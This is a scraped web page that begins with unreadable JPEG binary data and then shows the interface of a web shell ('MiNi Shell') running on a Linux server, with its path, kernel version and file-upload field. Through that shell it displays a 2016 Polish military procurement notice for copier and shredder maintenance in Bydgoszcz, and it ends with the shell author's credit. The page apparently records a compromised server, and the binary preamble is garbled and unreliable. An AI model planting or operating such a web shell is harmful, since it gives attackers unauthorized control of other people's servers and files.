JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160520/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160520/128176-N-2016.html

<p class="kh_header"><b>Bydgoszcz: OKRESOWE USŁUGI KONSERWACJI I NAPRAWY URZĄDZEŃ WIELOFUNKCYJNYCH, KSEROKOPIAREK ORAZ NISZCZAREK</b><br>
<b>Numer ogłoszenia: 128176 - 2016; data zamieszczenia: 20.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 11 Wojskowy Oddział Gospodarczy , ul. Gdańska 147, 85-915 Bydgoszcz, woj. kujawsko-pomorskie, tel. 52 378 13 19, faks 52 378 13 13.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.11wog.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Wojskowa Jednostka Budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OKRESOWE USŁUGI KONSERWACJI I NAPRAWY URZĄDZEŃ WIELOFUNKCYJNYCH, KSEROKOPIAREK ORAZ NISZCZAREK.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> OKRESOWE USŁUGI KONSERWACJI I NAPRAWY URZĄDZEŃ WIELOFUNKCYJNYCH, KSEROKOPIAREK ORAZ NISZCZAREK.
Zamawiający dopuszcza składanie ofert częściowych na jedną lub więcej niżej wymienionych części:
Część 1: Konserwacja i naprawa urządzeń wielofunkcyjnych - Służba Sprzętu Łączności i Informatyki;
Część 2: Konserwacja i naprawa kserokopiarek - Sekcja Wychowawcza;
Część 3: Konserwacja i naprawa kserokopiarek - Służba Uzbrojenia i Elektroniki;
Część 4: Konserwacja i naprawa niszczarek - Infrastruktura..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.31.20.00-5, 50.31.31.00-3, 50.31.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek udziału w postępowaniu w zakresie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, zostanie uznany za spełniony, 
gdy Wykonawca złoży oświadczenie o spełnianiu warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni udokumentować posiadanie wiedzy i doświadczenia poprzez wykazanie, że: w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali co najmniej 1 usługę, wraz z podaniem jej wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługa została wykonana, oraz załączeniem dowodu, czy została lub jest wykonywana należycie;
Za usługę odpowiadającą swoim rodzajem usłudze stanowiącej przedmiot zamówienia Zamawiający uzna usługę konserwacji i naprawy urządzeń wielofunkcyjnych, kserokopiarek oraz niszczarek o wartości brutto każdej nie mniejszej niż:
część I: 50 000,00 zł; część II - 10 000,00 zł, część III - 15 000,00 zł, 
część IV- 40 000,00 zł.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania odpowiednim potencjałem technicznym do wykonania zamówienia zostanie uznany za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnianiu warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania odpowiednimi osobami zdolnymi do wykonania zamówienia zostanie uznany za spełniony, jeżeli Wykonawca dysponuje pracownikami posiadającymi:
dotyczy części I przedmiotu zamówienia
a) pracownicy wykonujący czynności konserwacyjne i naprawcze na terenie Rejonowym Laboratorium MPS, Orkiestry Wojskowej, Delegatury Wojskowej Ochrony Przeciwpożarowej, 1 Wojskowego Szpitala Polowego, Delegatury Wojskowej Komendy Transportu, 2 Wojskowego Ośrodka Metrologii, Centrum Doktryn i Szkolenia SZ powinni posiadać - aktualne zaświadczenia stwierdzające przeszkolenie w zakresie ochrony informacji niejawnych,
b) pracownicy wykonujący czynności konserwacyjne i naprawcze na terenie 
11 Wojskowego Oddziału Gospodarczego, Inspektoratu Wsparcia Sił Zbrojnych, Rejonowego Zarządu Infrastruktury, Wojskowego Biura Emerytalnego, Wojskowej Komendy Uzupełnień, Wojewódzkiego Sztabu Wojskowego, Oddziału Żandarmerii Wojskowej, Klubu Inspektoratu Wsparcia Sił Zbrojnych, batalion dowodzenia IWsp SZ, Wojskowego Ośrodka Medycyny Prewencyjnej, 7 Rejonowego Przedstawicielstwa Wojskowego, Delegatury Departamentu Kontroli MON, Centralnej Grupy Działań Psychologicznych (JW 3557), Zespołu Zarządzania Wsparcia Teleinformatycznego powinni posiadać: poświadczenia bezpieczeństwa lub upoważnienie do dostępu do informacji niejawnych o klauzuli minimum ZASTRZEŻONE i aktualne, wydane po wejściu w życie ustawy o ochronie informacji niejawnych z dnia 5 sierpnia 2010 r. zaświadczenie o odbytym szkoleniu z zakresu ochrony informacji niejawnych.
dotyczy części II przedmiotu zamówienia
a) pracownicy wykonujący czynności konserwacyjne na terenie Centralnej Grupy Działań Psychologicznych, Oddziału Żandarmerii Wojskowej, batalionu dowodzenia IWsp SZ winni posiadać - aktualne poświadczenia bezpieczeństwa upoważniające do dostępu do informacji niejawnych 
o klauzuli minimum ZASTRZEŻONE i aktualne zaświadczenia stwierdzające przeszkolenie w zakresie ochrony informacji niejawnych,
b) pracownicy wykonujący czynności konserwacyjne i naprawcze na terenie Rejonowego Wsparcia Teleinformatycznego powinni posiadać - aktualne zaświadczenia stwierdzające przeszkolenie w zakresie ochrony informacji niejawnych
c) w stosunku do pracowników prowadzących czynności konserwacji i naprawy na terenie Klubu Inspektoratu Wsparcia Sił Zbrojnych, 22 Ośrodka Dowodzenia i Naprowadzania, 2 Regionu Wsparcia Teleinformatycznego, Oddziału Zabezpieczenia JFTC - Zamawiający nie wymaga od pracowników Wykonawcy posiadania dokumentów związanych z ochroną informacji niejawnych.
dotyczy części III przedmiotu zamówienia
a) pracownicy wykonujący czynności konserwacyjne i naprawcze na terenie 
11 Wojskowego Oddziału Gospodarczego, Inspektoratu Wsparcia Sił Zbrojnych, batalionu dowodzenia IWsp SZ, Komendy Garnizonu, Klubu Inspektoratu Wsparcia Sił Zbrojnych, Wojewódzkiego Sztabu Wojskowego, Wojskowej Komendzie Uzupełnień, 7 Rejonowego Przedstawicielstwa Wojskowego, Centralnej Wojskowej Pracowni Psychologicznej, Wojskowego Oddziału Medycyny Prewencyjnej, Oddziału Żandarmerii Wojskowej, Rejonowego Zarządu Infrastruktury powinni posiadać - aktualne poświadczenia bezpieczeństwa lub upoważnienie do dostępu do informacji niejawnych o klauzuli minimum ZASTRZEŻONE i aktualne zaświadczenia stwierdzające przeszkolenie w zakresie ochrony informacji niejawnych,
b) pracownicy wykonujący czynności konserwacyjne i naprawcze na terenie Wojskowego Biura Emerytalnego powinni posiadać - aktualne poświadczenia bezpieczeństwa lub pisemne upoważnienie do dostępu do informacji niejawnych o klauzuli minimum ZASTRZEŻONE i aktualne zaświadczenia stwierdzające przeszkolenie w zakresie ochrony informacji niejawnych oraz aktualne zaświadczenie o niekaralności.
c) pracownicy wykonujący czynności konserwacyjne i naprawcze na terenie Parafii Wojskowej, Regionu Wsparcia Teleinformatycznego, 
2 Wojskowego Ośrodka Metrologii, Delegatury Wojskowej Ochrony Przeciwpożarowej, Centrum Doktryn i Szkolenia SZ, 1 Wojskowy Szpital Polowy, 1 Kompanii Regulacji Ruchu, Wojskowa Pracownia Psychologiczna, Rejonowe Laboratorium MPS, Orkiestra Wojskowa, Delegatura Wojskowej Inspekcji Gospodarki Energetycznej powinni posiadać aktualne zaświadczenia stwierdzające przeszkolenie w zakresie ochrony informacji niejawnych oraz aktualne zaświadczenie o niekaralności.
dotyczy części IV przedmiotu zamówienia
a) pracownicy wykonujący czynności konserwacyjne na terenie Centralnej Grupy Działań Psychologicznych, Rejonowego Wsparcia Teleinformatycznego, Wojskowej Komendy Uzupełnień, Wojewódzkiego Sztabu Wojskowego, Inspektoratu Wsparcia Sił Zbrojnych, Wojskowego Biura Emerytalnego, Rejonowej Wojskowej Komisji Lekarskiej, Oddziału Żandarmerii Wojskowej, batalionu dowodzenia IWsp SZ, 7 Rejonowego Przedstawicielstwa Wojskowego winni posiadać - aktualne poświadczenia bezpieczeństwa upoważniające do dostępu do informacji niejawnych o klauzuli minimum ZASTRZEŻONE aktualne, wydane po wejściu w życie ustawy o ochronie informacji niejawnych z dnia 5 sierpnia 2010 r. zaświadczenie o odbytym szkoleniu z zakresu ochrony informacji niejawnych,
b) w stosunku do pracowników prowadzących czynności konserwacji i naprawy na terenie 11 Wojskowego Oddziału Gospodarczego, 2 Wojskowego Ośrodka Metrologii, 1 Kampanii Regulacji Ruchu, Orkiestry Wojskowej, Centrum Doktryn i Szkolenia SZ, Oddziału Zabezpieczenia JFTC, Centrum Eksperckim Policji NATO Zamawiający nie wymaga od pracowników Wykonawcy posiadania dokumentów związanych z ochroną informacji niejawnych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący sytuacji ekonomicznej i finansowej zostanie uznany za spełniony, gdy Wykonawca złoży oświadczenie o spełnianiu warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - wartość 1 roboczogodziny - 20</li>
<li>3 - Czas stawiennictwa w przypadku awarii sprzętu - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że konieczność wprowadzenia takich zmian wynika z zaistnienia następujących warunków:
1) w przypadku działania siły wyższej, zaistnienia sytuacji nadzwyczajnych, nie cierpiących zwłoki raz innych okoliczności niezależnych od stron umowy;
2) zaistnienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, a które wymagają natychmiastowego działania;
3) zmienionych faktycznych potrzeb Zamawiającego;
4) ograniczenia planu finansowego przeznaczonego na realizację umowy 
5) w przypadku możliwości zastosowania nowszych i korzystniejszych dla Zamawiającego rozwiązań technologicznych lub technicznych, niż te istniejące w chwili podpisania umowy;   
6) potrzeby zmian wynikających z postanowień niniejszej umowy;
7) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy;
8) zmiany obowiązującej stawki VAT.
2. Zamawiający zastrzega sobie prawo ograniczenia przedmiotu umowy - 
w przypadku wyłączenia urządzenia z użytkowania lub jego awarii, skutkującej zmianą wielkości i zakresu zamówienia w czasie trwania umowy. Zamawiający nie będzie ponosił ujemnych skutków finansowych tych zmian.
3. Warunkiem wprowadzenia zmian, o których mowa w ust. 1, jest złożenie wniosku wraz z uzasadnieniem zawierającym, odpowiednio: opis propozycji zmian, uzasadnienie zmian, obliczenie kosztów zmian, jeżeli zmiana będzie miała wpływ na wynagrodzenie Wykonawcy, wpływ zmian na termin wykonania umowy .
4. Wszelkie zmiany treści niniejszej umowy oraz jej uzupełniania wymagają formy pisemnej pod rygorem nieważności, z zastrzeżeniem ust. 5.
5. O wszelkich zmianach nazwy, adresu i danych identyfikacyjnych firmy oraz numeru rachunku bankowego Wykonawca powiadomi na piśmie niezwłocznie Zamawiającego pod rygorem poniesienia kosztów związanych z brakiem właściwych danych u Zamawiającego oraz rygorem uznania za doręczoną korespondencji kierowanej na ostatnio wskazany przez Wykonawcę adres. Zmiany te nie wymagają sporządzenia aneksu do umowy. 
6. Wykonawca nie może domagać się zmiany postanowień zawartej umowy 
w związku z niewykonaniem lub nienależytym wykonaniem przez niego zobowiązań wynikających z umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.11wog.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 11 Wojskowy Oddział Gospodarczy ul. Gdańska 147, 85-915 Bydgoszcz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.05.2016 godzina 09:00, miejsce: 11 Wojskowy Oddział Gospodarczy ul. Gdańska 147, 85-915 Bydgoszcz - kancelaria jawna. Godz. pracy kancelarii 7.30 - 9.00 i 12.30 - 15.15 w dni robocze od poniedziałku do piątku.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Konserwacja i naprawa urządzeń wielofunkcyjnych - Służba Sprzętu Łączności i Informatyki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Konserwacja i naprawa urządzeń wielofunkcyjnych - Służba Sprzętu Łączności i Informatyki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.31.20.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Wartość 1 roboczogodziny - 20</li>
<li>3. Czas stawiennictwa w przypadku awarii sprzętu - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Konserwacja i naprawa kserokopiarek - Sekcja Wychowawcza.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Konserwacja i naprawa kserokopiarek - Sekcja Wychowawcza.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.31.31.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Wartość 1 roboczogodziny - 20</li>
<li>3. Czas stawiennictwa w przypadku awarii sprzętu - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Konserwacja i naprawa kserokopiarek - Służba Uzbrojenia i Elektroniki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Konserwacja i naprawa kserokopiarek - Służba Uzbrojenia i Elektroniki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.31.31.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Wartość 1 roboczogodziny - 20</li>
<li>3. Czas stawiennictwa w przypadku awarii sprzętu - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Konserwacja i naprawa niszczarek - Infrastruktura.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Konserwacja i naprawa niszczarek - Infrastruktura.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.31.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Wartość 1 roboczogodziny - 20</li>
<li>3. Czas stawiennictwa w przypadku awarii sprzętu - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com